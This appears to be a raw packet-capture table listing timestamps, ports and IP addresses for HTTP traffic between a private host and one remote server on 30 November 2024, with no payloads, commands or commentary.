Nov 30, 2024 04:06:43.946135044 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.947896004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.947907925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.949626923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.950258970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.950423956 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.950434923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.950903893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.951051950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.951710939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.951725006 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.951936960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.951948881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.952733994 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.952887058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.953655958 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.953771114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.954649925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.954750061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.955591917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.955692053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.956557989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.956672907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.956864119 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.957106113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.957106113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.957106113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.957501888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.957609892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.958558083 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.958640099 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.959444046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.959570885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.960423946 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.960531950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.961045980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.964309931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.964320898 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.964329958 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.964340925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.964363098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.964373112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.964384079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.964394093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.965261936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.965804100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.966324091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:43.969407082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:43.969614029 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.095802069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.096050024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.096487045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.096647978 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.097378016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.097512007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.098387003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.098563910 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.098757982 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.099301100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.099469900 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.099787951 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.100244045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.100389957 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.101268053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.101437092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.104407072 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.123990059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.124001980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.124053001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.124209881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.124578953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.124614954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.124655962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.125555992 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.125567913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.126091003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.126754999 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.126766920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.127283096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.127695084 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.128057957 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.128165007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.129470110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.129479885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.129879951 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.129965067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.130043983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.130309105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.130925894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.131010056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.131320000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.133049965 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.133060932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.133106947 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.133543015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.134145021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.134155035 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.134299040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.134696007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.134707928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.134767056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.134835005 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.134877920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.135070086 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.136008978 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.136061907 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.136171103 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.136462927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.137758970 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.138081074 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.138226032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.138236046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.138250113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.138489008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.138673067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.138715982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.138900042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.140961885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.140971899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.141803026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.141829014 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.141979933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.142591953 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.142604113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.143492937 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.143621922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.144484997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.144496918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.144548893 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.144895077 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.145358086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.145538092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.145637035 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.146433115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.146444082 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.146488905 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.147258997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.147397995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.147639036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.147825003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.148305893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.148474932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.148777962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.149246931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.149317026 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.149409056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.149632931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.150121927 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.150171995 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.150274038 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.151169062 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.151211023 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.151299953 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.151473045 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.152090073 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.152226925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.152551889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.152597904 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.153068066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.153196096 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.153314114 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.153913021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.154211044 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.154318094 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.154962063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.155119896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.155255079 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.155915976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.156074047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.156872034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.156945944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.157043934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.157103062 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.157260895 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.157898903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.157975912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.158068895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.158153057 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.158780098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.159044981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.159198046 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.159809113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.159959078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.160001040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.160895109 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.160907030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.161077976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.161797047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.161808968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.161858082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.162772894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.162786007 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.162942886 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.163707018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.163841009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.163913965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.164710999 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.164724112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.165123940 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.165425062 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.165478945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.165623903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.165680885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.166495085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.166651011 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.167562008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.167572975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.168072939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.169071913 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.297102928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.297156096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.297369003 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.297640085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.297688007 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.297785997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.298090935 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.298737049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.298749924 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.298794985 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.299565077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.299720049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.299763918 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.300568104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.300710917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.301366091 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.301553011 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.301615000 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.301701069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.302453995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.302599907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.304727077 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.326064110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.326112032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.326198101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.326247931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.326610088 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.326621056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.326838970 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.327583075 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.327594042 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.327630997 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.328572989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.328583956 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.328624964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.329469919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.329648018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.329654932 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.329689980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.330504894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.330517054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.330557108 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.331413031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.331424952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.331695080 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.332324028 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.332374096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.332461119 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.332676888 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.333163023 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.333214045 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.333302021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.333378077 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.334209919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.334259987 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.334404945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.334450006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.335150957 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.335287094 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.335308075 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.335360050 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.336190939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.336280107 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.336318016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.336365938 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.337193966 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.337240934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.337306976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.337353945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.338093042 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.338104963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.338315010 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.338968992 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.339013100 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.339143991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.339196920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.340115070 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.340241909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.340284109 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.340959072 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.341015100 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.341105938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.341846943 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.342021942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.342073917 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.342164040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.342206001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.342943907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.343101025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.343121052 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.343138933 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.343884945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.344048977 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.344095945 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.344911098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.344969034 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.345060110 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.345113993 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.345794916 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.345959902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.345980883 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.346007109 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.346719980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.346766949 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.346910954 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.346955061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.347702980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.347759962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.347842932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.347898960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.348685026 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.348776102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.348841906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.348884106 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.349735975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.349747896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.349780083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.349792957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.350536108 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.350605965 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.350712061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.350766897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.351690054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.351701975 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.352106094 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.352567911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.352579117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.352636099 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.353406906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.353457928 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.353468895 CET	80	49840	185.215.113.16	192.168.2.4
